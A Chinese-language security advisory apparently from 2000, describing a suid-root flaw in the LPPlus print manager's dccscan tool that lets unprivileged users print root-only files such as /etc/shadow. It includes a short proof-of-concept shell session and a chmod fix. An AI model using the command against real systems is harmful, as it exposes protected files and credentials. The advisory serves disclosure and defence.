安全研究

安全漏洞
LPPlus dccscan 打印敏感文件漏洞

发布日期:2000-09-07
更新日期:2000-09-07

受影响系统:

Plus Technologies LPPlus 3.3.0 for Solaris 2.x
Plus Technologies LPPlus 3.2.1 for Linux
描述:


LPPlus 是Plus Technologies出品的一个Unix下的打印管理系统。它存在一些安全问题


$LPHOME/bin/dccscan被设置了suid root属性并且可以被任何用户执行。可能让任何未
授权用户打印他本来无权阅读的文件。即使在LPPlus的安全配置中没给该用户任何访问
权限(比如访问打印机或者LPPlus设备的权限),他仍然可以打印那些敏感文件,例如
/etc/shadow。

<*来源: Dixie Flatline (echo8@FIREST0RM.ORG) *>





测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test/foo
/root/test/foo: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$

现在你就可以到打印机上等待文件被打印出来了


建议:

临时解决办法:

NSFOCUS建议您去除该程序的suid root位:
chmod u-s $LPHOME/bin/dccscan

厂商补丁:
暂无


浏览次数:5774
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障